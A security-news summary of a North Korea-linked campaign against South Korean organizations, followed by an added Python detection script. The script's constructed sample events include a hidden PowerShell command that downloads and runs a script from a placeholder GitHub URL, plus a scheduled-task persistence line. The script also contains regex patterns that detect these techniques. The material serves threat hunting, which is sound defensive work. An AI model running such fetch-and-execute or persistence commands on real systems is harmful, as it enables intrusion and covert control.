
Phishing LNK files and GitHub C2 power new DPRK cyber attacks

North Korea-linked threat actors are targeting South Korean organizations with phishing emails that deliver malicious LNK files, then use GitHub repositories as command-and-control infrastructure for stealthy, PowerShell-based attacks.

Key Points

  • Attackers use phishing emails containing obfuscated LNK files that drop decoy PDF documents and malicious PowerShell scripts.
  • The campaign leverages GitHub repositories, including the primary "motoralis" account, to host payloads and exfiltrate stolen system data.
  • Malicious scripts employ anti-analysis checks to detect security tools and establish persistence through Windows scheduled tasks.
  • Threat actors use multiple active and dormant GitHub accounts to maintain operational redundancy and evade corporate security filters.
  • The malware uses a "keep-alive" script to upload network configuration logs to GitHub, enabling real-time monitoring of compromised environments.
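
The key points above describe a chain that is visible in endpoint telemetry even though every component is a built-in Windows tool: Explorer launching PowerShell (what a double-clicked LNK looks like), hidden or encoded PowerShell flags, a GitHub URL in the command line, and a scheduled task whose action is PowerShell. The following hunting script is an added example, not code from the article or from the campaign; the process-creation events it parses are constructed (field layout loosely modelled on Sysmon Event ID 1 exports, repository names and paths invented) and the indicator names are assumptions chosen for this illustration.

```python
"""Hunt for the LNK -> hidden PowerShell -> GitHub -> scheduled-task chain.

Added example: parses constructed process-creation events and flags hosts
where several of the described indicators co-occur. Data is invented.
"""
import re
from collections import defaultdict

# Constructed sample events: host<TAB>parent image<TAB>image<TAB>command line.
SAMPLE_EVENTS = """\
ws01\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -nop -w hidden -ep bypass -c "iex (iwr https://raw.githubusercontent.com/example/repo/main/stage2.ps1)"
ws01\tpowershell.exe\tC:\\Windows\\System32\\schtasks.exe\tschtasks /create /sc minute /mo 5 /tn Updater /tr "powershell -w hidden -File C:\\Users\\Public\\ka.ps1"
ws02\tC:\\Windows\\explorer.exe\tC:\\Program Files\\Git\\bin\\git.exe\tgit pull origin main
ws03\tC:\\Windows\\System32\\cmd.exe\tpowershell.exe\tpowershell -Command Get-Process
"""

# Image name is powershell.exe / pwsh(.exe), with or without a directory.
POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.I)
# Flags commonly used to hide the console or pass an encoded/unrestricted script.
HIDDEN_FLAGS = re.compile(
    r"-(w(indowstyle)?\s+hidden|nop|noprofile|enc|encodedcommand|ep\s+bypass)", re.I
)
# GitHub web, API, raw-content and gist hosts.
GITHUB_HOST = re.compile(r"https?://(api\.|raw\.|gist\.)?github(usercontent)?\.com/", re.I)
# schtasks /create whose action runs PowerShell (the persistence step).
SCHTASKS_PS = re.compile(r"schtasks.*/create.*(powershell|pwsh)", re.I)


def parse_events(text):
    """Split tab-separated event lines into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, parent, image, cmdline = line.split("\t", 3)
        events.append({"host": host, "parent": parent, "image": image, "cmdline": cmdline})
    return events


def classify(ev):
    """Return the set of indicator names a single event matches."""
    hits = set()
    is_ps = bool(POWERSHELL.search(ev["image"]))
    if is_ps and ev["parent"].lower().endswith("explorer.exe"):
        hits.add("explorer_spawned_powershell")  # typical of a user opening a LNK
    if is_ps and HIDDEN_FLAGS.search(ev["cmdline"]):
        hits.add("hidden_or_encoded_powershell")
    if is_ps and GITHUB_HOST.search(ev["cmdline"]):
        hits.add("powershell_github_url")
    if ev["image"].lower().endswith("schtasks.exe") and SCHTASKS_PS.search(ev["cmdline"]):
        hits.add("scheduled_task_with_powershell")
    return hits


def hunt(text, min_indicators=3):
    """Aggregate indicators per host; report hosts reaching the threshold."""
    per_host = defaultdict(set)
    for ev in parse_events(text):
        per_host[ev["host"]] |= classify(ev)
    return {h: sorted(i) for h, i in per_host.items() if len(i) >= min_indicators}


if __name__ == "__main__":
    for host, indicators in hunt(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(indicators))
```

Requiring several indicators per host rather than alerting on any single one is deliberate: developer workstations legitimately reach GitHub, and administrators legitimately register PowerShell scheduled tasks, so a lone match is noise, while Explorer spawning a hidden PowerShell that fetches from GitHub and then installs a task is the sequence the article describes. In production the same logic would run over a real process-creation feed (Sysmon, EDR) rather than the embedded sample.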

Why it Matters

This campaign shows how capable threat actors abuse trusted platforms like GitHub to bypass traditional network security filters and blend their traffic with legitimate activity. By relying on built-in Windows tools (LNK files, PowerShell, scheduled tasks) rather than custom malware, the attackers leave a smaller footprint and make detection harder for corporate security teams, which shifts the burden onto process-level telemetry and behavioral correlation rather than file signatures or domain blocklists.
Source: Securityaffairs.com, published by Pierluigi Paganini